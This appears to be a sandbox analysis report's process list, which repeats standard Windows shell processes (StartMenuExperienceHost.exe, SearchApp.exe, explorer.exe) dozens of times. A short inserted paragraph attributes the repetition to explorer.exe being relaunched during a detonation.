"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

The three entries above (StartMenuExperienceHost.exe, SearchApp.exe and explorer.exe, each followed by its command line) are repeated a further 68 times at this point in the process list. 66 of those repetitions contain all three entries; the other two contain only StartMenuExperienceHost.exe and explorer.exe. Every repetition is identical in image path and command line, and no PID or timestamp distinguishes them in this listing. StartMenuExperienceHost.exe and SearchApp.exe are the hosts that the Windows shell starts for the Start menu and search, so a run of identical entries like this shows that explorer.exe was launched repeatedly during the detonation rather than once at logon.

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

